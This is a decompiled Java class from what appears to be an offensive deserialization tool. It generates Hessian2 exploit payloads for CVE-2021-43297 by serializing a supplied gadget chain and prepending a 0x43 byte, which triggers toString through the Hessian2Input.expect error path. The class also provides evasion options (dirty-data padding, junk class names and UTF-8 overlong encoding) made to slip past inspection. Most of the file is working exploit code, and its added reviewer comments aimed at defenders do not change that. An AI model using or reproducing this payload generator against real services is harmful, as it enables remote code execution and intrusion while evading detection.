package com.ar3h.chains.core.payload.impl;

import com.ar3h.chains.common.PayloadMode;
import com.ar3h.chains.common.Tag;
import com.ar3h.chains.common.annotations.PayloadAnnotation;
import com.ar3h.chains.common.param.Choice;
import com.ar3h.chains.common.param.Param;
import com.ar3h.chains.common.param.ParamType;
import com.ar3h.chains.core.payload.AbstractHessianPayload;
import com.ar3h.chains.core.payload.enhance.DirtyDataWrapper;
import com.ar3h.chains.core.payload.enhance.Hessian2OutputEnhance;
import com.caucho.hessian.io.Hessian2Output;
import com.vaadin.sass.internal.parser.LexicalUnitImpl;
import java.io.ByteArrayOutputStream;
import javax.resource.spi.work.WorkException;
import javax.validation.constraints.Max;
import javax.validation.constraints.Min;
import org.slf4j.Logger;
import org.slf4j.LoggerFactory;

/**
 * Generation-mode payload that Hessian2-serializes a caller-supplied object graph for
 * CVE-2021-43297.
 *
 * <p>The annotation strings below are Chinese and are kept verbatim because they are read at
 * runtime. In English: name "Hessian2: force an error to invoke toString"; description
 * "inside com.caucho.hessian.io.Hessian2Input.expect, an object's toString method can be
 * triggered through implicit string conversion".
 *
 * <p>Reviewer note for defenders: the two padding fields and {@code overlongMode} are
 * obfuscation options. Inspection that matches class names as canonical UTF-8 bytes, or that
 * scans only a bounded prefix of the stream, should therefore not be relied on as the control.
 * Restrict deserializable classes in the Hessian reader itself and run a release that carries
 * the fix for this CVE.
 */
@PayloadAnnotation(
        name = "Hessian2 强制报错调用 toString",
        description = "CVE-2021-43297\nHessian2Input 的 com.caucho.hessian.io.Hessian2Input.expect 函数内可以通过隐式字符串转换触发对象的toString方法",
        gadgetTags = {Tag.ToString},
        excludes = {Tag.NotForHessian},
        mode = {PayloadMode.GENERATE_MODE},
        priority = 10)
/* loaded from: input_file:BOOT-INF/lib/chains-core-1.4.1.jar:com/ar3h/chains/core/payload/impl/Hessian2ToStringPayload.class */
public class Hessian2ToStringPayload extends AbstractHessianPayload {
    private static final Logger log = LoggerFactory.getLogger(Hessian2ToStringPayload.class);

    /**
     * Size of the collection padding passed to {@link DirtyDataWrapper}; 0 is the default.
     *
     * <p>Description, translated: "randomly wraps the object in ArrayList / LinkedList / HashMap /
     * LinkedHashMap / TreeMap and similar collections with the given amount of dirty data; this
     * obfuscation is recommended; reference: 10 million entries take 2 seconds and yield a 43MB
     * payload".
     */
    @Max(30000000)
    @Param(
            name = "随机集合脏数据大小",
            description = "随机使用 ArrayList/LinkedList/HashMap/LinkedHashMap/TreeMap 等集合类型来封装 object，并指定脏数据大小\n推荐使用该混淆\n参考数据：1千万脏数据需要2秒, 可生成 43MB Payload")
    @Min(0)
    public int dirtyCollectionSize = 0;

    /**
     * Number of junk class names passed to {@link DirtyDataWrapper}; 0 is the default.
     *
     * <p>Description, translated: "wraps the object in a LinkedList of random junk class names;
     * generation is very slow, values above 100k are not advised; reference: 100k entries take
     * 8 seconds and yield a 2.5MB payload".
     */
    // NOTE(review): LexicalUnitImpl.PRECISION looks like a decompiler constant-matching artifact
    // rather than a real dependency on the Sass parser; the "10w" in the description suggests the
    // bound is 100000 - confirm against the original source.
    @Max(LexicalUnitImpl.PRECISION)
    @Param(
            name = "填充垃圾类的数量",
            description = "使用 LinkedList 包装随机垃圾类名来封装 object\n生成速度极慢，不建议设置超过10w\n参考数据：10w脏数据需要8秒, 可生成 2.5MB Payload")
    @Min(0)
    public int dirtyClassSize = 0;

    /**
     * UTF-8 overlong-encoding mode, parsed as an int by {@link #marshal(Object)}.
     *
     * <p>Choices, translated: 0 = disabled; 1 = random even mix of 2- and 3-byte overlong
     * encoding; 2 = 2-byte only; 3 = 3-byte only.
     */
    // NOTE(review): WorkException.TX_RECREATE_FAILED as the fourth label is presumably the
    // decompiler substituting a matching constant for the literal "3" - confirm.
    @Param(
            name = "Utf8OverlongEncoding",
            description = "0: 不开启 utf8 overlong encoding\n1: 随机平均混合2、3 utf8 overlong encoding\n2: 纯2字节 utf8 overlong encoding\n3: 纯3字节 utf8 overlong encoding",
            type = ParamType.Choice,
            choices = {
                @Choice(label = "0", value = "不开启 utf8 overlong encoding"),
                @Choice(label = "1", value = "随机平均混合2、3 utf8 overlong encoding"),
                @Choice(label = "2", value = "纯2字节 utf8 overlong encoding"),
                @Choice(label = WorkException.TX_RECREATE_FAILED, value = "纯3字节 utf8 overlong encoding")
            })
    public String overlongMode = "0";

    /**
     * Serializes {@code obj}, wrapped by {@link DirtyDataWrapper}, with Hessian2 and returns the
     * bytes with one extra leading byte.
     *
     * @param obj object graph to serialize
     * @return a single 0x43 byte followed by the Hessian2 encoding of the wrapped object
     * @throws Exception if {@code overlongMode} is not an integer or serialization fails
     */
    /* JADX WARN: Can't rename method to resolve collision */
    @Override // com.ar3h.chains.common.Payload
    public byte[] marshal(Object obj) throws Exception {
        int mode = Integer.parseInt(overlongMode);
        ByteArrayOutputStream sink = new ByteArrayOutputStream();

        Object wrapped = DirtyDataWrapper.builder(obj)
                .withDirtyCollectionSize(dirtyCollectionSize)
                .withDirtyClassSize(dirtyClassSize)
                .build();

        // Any positive mode selects the overlong-encoding writer; otherwise the stock one is used.
        Hessian2Output writer;
        if (mode > 0) {
            log.info("Enable Hessian2 utf8overlong, overlongMode: {}", mode);
            writer = Hessian2OutputEnhance.getHessian2Output(sink, mode);
        } else {
            writer = new Hessian2Output(sink);
        }

        // The factory is configured to accept classes that do not implement Serializable.
        AbstractHessianPayload.NoWriteReplaceSerializerFactory factory =
                new AbstractHessianPayload.NoWriteReplaceSerializerFactory();
        factory.setAllowNonSerializable(true);
        writer.setSerializerFactory(factory);
        writer.writeObject(wrapped);
        writer.close();

        byte[] encoded = sink.toByteArray();
        byte[] framed = new byte[encoded.length + 1];
        // Leading 0x43 (ASCII 'C'). Presumably this is what sends the reader down the
        // Hessian2Input.expect error path named in the class description - confirm against the
        // Hessian version under test.
        framed[0] = 0x43;
        System.arraycopy(encoded, 0, framed, 1, encoded.length);
        return framed;
    }

    /**
     * Delegates to {@code Hessian2Payload.deserialize} with the bytes unchanged.
     *
     * @param bArr serialized bytes
     * @return whatever {@code Hessian2Payload.deserialize} returns
     * @throws Exception propagated from the delegate
     */
    @Override // com.ar3h.chains.common.Payload
    public Object unmarshal(byte[] bArr) throws Exception {
        return Hessian2Payload.deserialize(bArr);
    }
}
